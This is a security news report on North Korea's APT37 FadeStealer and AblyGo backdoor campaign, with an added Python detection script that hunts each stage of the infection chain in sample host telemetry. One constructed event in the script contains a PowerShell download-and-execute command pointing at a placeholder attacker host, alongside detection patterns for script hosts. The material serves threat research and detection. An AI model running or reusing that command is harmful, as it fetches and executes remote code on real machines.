The North Korean APT37 hacking group uses a new ‘FadeStealer’ information-stealing malware containing a ‘wiretapping’ feature, allowing the threat actor to snoop and record from victims’ microphones.
APT37, also known as ScarCruft, Reaper, or RedEyes, is believed to be a state-sponsored hacking group with a long history of conducting cyber espionage attacks aligned with North Korean interests. These attacks target North Korean defectors, educational institutions, and EU-based organizations.
In the past, the hackers were known to utilize custom malware called ‘Dolphin’ and ‘M2RAT’ to execute commands and steal data, credentials, and screenshots from Windows devices and even connected mobile phones.
It starts with a CHM file
In a new report from the AhnLab Security Emergency Response Center (ASEC), researchers provide information on new custom malware dubbed ‘AblyGo backdoor’ and ‘FadeStealer’ that the threat actors use in cyber espionage attacks.
The malware is believed to be delivered using phishing emails with attached archives containing password-protected Word and Hangul Word Processor documents (.docx and .hwp files) and a ‘password.chm’ Windows CHM file.
ASEC believes that the phishing emails instruct the recipient to open the CHM file to obtain the password for the documents, which begins the infection process on the Windows device.
Once the CHM file is opened, it displays the promised password for the documents while quietly downloading and executing a remote PowerShell script. That script carries backdoor functionality and is registered to autostart with Windows.
This PowerShell backdoor communicates with the attackers’ command and control servers and executes any commands sent by the attackers.
The PowerShell backdoor is used to deploy an additional backdoor, written in Go, that is used in the later stages of the attack for privilege escalation, data theft, and the delivery of further malware.
This new backdoor is named ‘AblyGo backdoor,’ as it uses the Ably Platform, an API service that allows developers to deploy real-time features and information delivery in their applications.
The threat actors use Ably as a command and control platform: they send base64-encoded commands to the backdoor, which executes them and posts the output back through Ably, where the threat actors later retrieve it.
As this is a legitimate platform, it is likely used by the threat actors to evade network monitoring and security software.
ASEC gained access to the Ably API key used by the backdoor and could monitor some of the commands issued by the attackers. These commands illustrated how the hackers used the backdoor to list the files in a directory, rename a fake .jpg file to an .exe file, and then execute it.
However, it is technically possible for the threat actor to send any command they wish to execute.
FadeStealer wiretaps your device
Ultimately, the backdoors deploy a final payload in the form of ‘FadeStealer,’ an information-stealing malware capable of stealing a wide variety of information from Windows devices.
When installed, FadeStealer is loaded via DLL sideloading into the legitimate Internet Explorer add-on installer process ‘ieinstal.exe’ and begins stealing data from the device, packaging it into RAR archives every 30 minutes.
The data includes screenshots, logged keystrokes, and files collected from connected smartphones and removable devices. The malware also includes the ability to record audio from a connected microphone, enabling the threat actors to listen in on conversations.
This data is staged in the following %Temp% folders:

| Folder Path | Exfiltrated Data |
|---|---|
| %temp%\VSTelems_FadeIn | Data collected from connected smartphone devices |
| %temp%\VSTelems_FadeOut | Data collected from removable media devices |
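Each stage of the chain described above (the CHM launching PowerShell, the Go backdoor beaconing to Ably, the DLL sideloaded into ieinstal.exe, and the FadeStealer staging folders under %Temp%) leaves a distinct mark in host telemetry. The script below is an added example written for this page, not code from ASEC, APT37, or the Ably SDK. It assumes Sysmon-style event fields, that Ably's service is reached under the ably.io domain, and that hh.exe (the Windows HTML Help executable) is the process that opens .chm files; all events in it are constructed samples, not captured data, and the base64 helpers mirror the command/output encoding the report describes for the Ably channel.

```python
"""Host-telemetry hunt for the APT37 CHM -> PowerShell -> Ably -> FadeStealer chain.

Added example for this page; not code from ASEC, APT37 or the Ably SDK.
Event fields are a simplified stand-in for Sysmon records; every event in
SAMPLE_EVENTS is constructed, not captured telemetry.
"""
import base64
import re
from dataclasses import dataclass


@dataclass
class Event:
    kind: str            # "process" | "imageload" | "file" | "network"
    image: str           # full path of the acting process
    parent: str = ""     # parent image (process events)
    cmdline: str = ""    # command line (process events)
    loaded: str = ""     # DLL path (imageload events)
    signed: bool = True  # DLL Authenticode state (imageload events)
    path: str = ""       # file created or written (file events)
    dest: str = ""       # destination hostname (network events)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


# Stage 1: hh.exe (the HTML Help handler for .chm) has no business spawning a
# script host; the page's chain starts with password.chm doing exactly that.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

def chm_spawned_script_host(ev: Event) -> bool:
    return ev.kind == "process" and basename(ev.parent) == "hh.exe" and basename(ev.image) in SCRIPT_HOSTS


# Stage 2: Ably traffic from a script host or from a binary living in a
# user-writable directory. Real Ably clients are usually installed apps, so this
# is a hunt lead, not a block rule. Assumption: Ably endpoints are under ably.io.
USER_WRITABLE = ("\\users\\", "\\programdata\\", "\\temp\\")

def ably_from_suspicious_client(ev: Event) -> bool:
    if ev.kind != "network" or not ev.dest.lower().endswith(".ably.io"):
        return False
    img = ev.image.lower()
    return basename(img) in SCRIPT_HOSTS or any(d in img for d in USER_WRITABLE)


# Stage 3: ieinstal.exe (Internet Explorer's add-on installer) loading a DLL from
# outside its own directory or the system directories, or an unsigned one,
# is the sideloading pattern the report describes for FadeStealer.
TRUSTED_DLL_DIRS = (
    "c:\\program files\\internet explorer\\",
    "c:\\program files (x86)\\internet explorer\\",
    "c:\\windows\\system32\\",
    "c:\\windows\\syswow64\\",
)

def ieinstal_sideload(ev: Event) -> bool:
    if ev.kind != "imageload" or basename(ev.image) != "ieinstal.exe":
        return False
    return (not ev.signed) or not ev.loaded.lower().startswith(TRUSTED_DLL_DIRS)


# Stage 4: FadeStealer staging. The report names %temp%\VSTelems_FadeIn and
# %temp%\VSTelems_FadeOut; matching the VSTelems_Fade prefix also catches any
# sibling folder of the same family, including the periodic RAR bundles in it.
STAGING_RE = re.compile(r"\\temp\\VSTelems_Fade\w*\\", re.IGNORECASE)

def fadestealer_staging(ev: Event) -> bool:
    return ev.kind == "file" and STAGING_RE.search(ev.path) is not None


# The Ably channel carries base64 commands one way and base64 output the other.
# Strict decoding fails loudly on a malformed payload instead of returning garbage.
def encode_command(cmd: str) -> str:
    return base64.b64encode(cmd.encode("utf-8")).decode("ascii")

def decode_command(data: str) -> str:
    return base64.b64decode(data, validate=True).decode("utf-8")


RULES = [
    ("chm_spawned_script_host", chm_spawned_script_host),
    ("ably_c2_from_suspicious_client", ably_from_suspicious_client),
    ("ieinstal_dll_sideload", ieinstal_sideload),
    ("fadestealer_staging_folder", fadestealer_staging),
]

def hunt(events):
    """Return (rule_name, acting image) for every event that trips a rule."""
    return [(name, basename(ev.image)) for ev in events for name, rule in RULES if rule(ev)]


# Constructed sample telemetry: one benign and one suspicious event per stage.
SAMPLE_EVENTS = [
    Event("process", image=r"C:\Windows\hh.exe", parent=r"C:\Windows\explorer.exe",
          cmdline=r'"C:\Windows\hh.exe" C:\Users\u\Downloads\password.chm'),
    Event("process", image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          parent=r"C:\Windows\hh.exe",
          cmdline="powershell -w hidden -c \"IEX(New-Object Net.WebClient).DownloadString('http://c2.example.invalid/p.ps1')\""),
    Event("network", image=r"C:\Users\u\AppData\Local\Temp\photo.exe", dest="realtime.ably.io"),
    Event("network", image=r"C:\Program Files\SomeVendor\app.exe", dest="realtime.ably.io"),
    Event("imageload", image=r"C:\Program Files\Internet Explorer\ieinstal.exe",
          loaded=r"C:\Users\u\AppData\Local\Temp\loader.dll", signed=False),
    Event("imageload", image=r"C:\Program Files\Internet Explorer\ieinstal.exe",
          loaded=r"C:\Windows\System32\kernel32.dll", signed=True),
    Event("file", image=r"C:\Program Files\Internet Explorer\ieinstal.exe",
          path=r"C:\Users\u\AppData\Local\Temp\VSTelems_FadeOut\20230621_1200.rar"),
]

if __name__ == "__main__":
    for rule, image in hunt(SAMPLE_EVENTS):
        print(f"{rule:32} {image}")
```

Run against the constructed events, the script reports exactly four hits, one per stage, and stays silent on the benign hh.exe launch, the installed application that legitimately talks to Ably, and ieinstal.exe loading a signed system DLL. In a real environment the Ably rule is the noisiest of the four and should be tuned against an inventory of applications known to use the service.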
The threat actors can then analyze this collected data to steal sensitive information for use by the North Korean government or conduct further attacks.
APT37 is not the only North Korean threat actor utilizing CHM files to deploy malware.
ASEC also reported today that the Kimsuky state-sponsored hacking group is utilizing CHM files in phishing attacks to deploy malicious scripts that steal user information and install additional malware.
“If you examine the overall attack flow in this case, the threat actor carried out their attack cleverly and precisely by employing spear phishing emails to gain access to target systems and using an Ably channel as a command-and-control server,” concluded the researchers.
“These sorts of attacks are difficult for individuals to notice.”